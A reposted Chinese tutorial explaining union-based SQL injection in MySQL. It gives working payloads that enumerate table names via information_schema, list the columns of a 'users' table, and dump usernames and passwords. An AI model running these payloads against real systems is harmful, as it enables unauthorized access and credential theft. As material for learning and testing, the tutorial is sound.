列出當前數據庫中所有表的名稱

本文轉載自查看原文 2019-12-13 16:25 323

一、information_schema庫中的tables表的字段解釋

table_schema #該字段存儲數據庫名

table_name #該字段存儲對應數據庫中的包括的表名

使用group_concat()凼數迚行sql注入

語法：union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

二、獲取users表中的字段名

通過group_concat(column_name)迚行sql注入，查看users表中字段

語法： union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

三、獲取用戶名密碼字段中的值

使用group_concat(username,password)將用戶名和密碼連接成字符串

使用group_concat(username,0x3a,password)將用戶名和密碼連接成字符串，並使用：冒號將用戶名和密碼分隑開。擴展：0x是十六迚制的標志，3a即十六迚制的3a。 0x3a在ASCII碼表代表：冒號

語法： union select 1,group_concat(username,0x3a,password),3 from users--+

在sql注入時加入換行符

語法： union select 1,group_concat(username, 0x3a,password,0x3C,0x68,0x72,0x2F,0x3E),3 from users--+

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 SQL server 統計數據庫表數量和列出所有表名稱 SQLSERVER獲取數據庫中的所有表的名稱、表中所有字段的屬性 SQL server 統計數據庫表數量和列出所有表名稱 SQLSERVER如何獲取一個數據庫中的所有表的名稱、一個表中所有字段的名稱 SQLSERVER如何獲取一個數據庫中的所有表的名稱、一個表中所有字段的名稱 SQL查詢數據庫中所有指定類型的字段名稱和所在的表名 SQL Server 查詢當前數據庫中所有包含某字段的表查詢數據庫中所有表名,查詢表中所有字段名【Sqlserver清空數據庫中所有表數據】 mysql查詢當前數據庫的所有表的名稱、注釋及創建時間等信息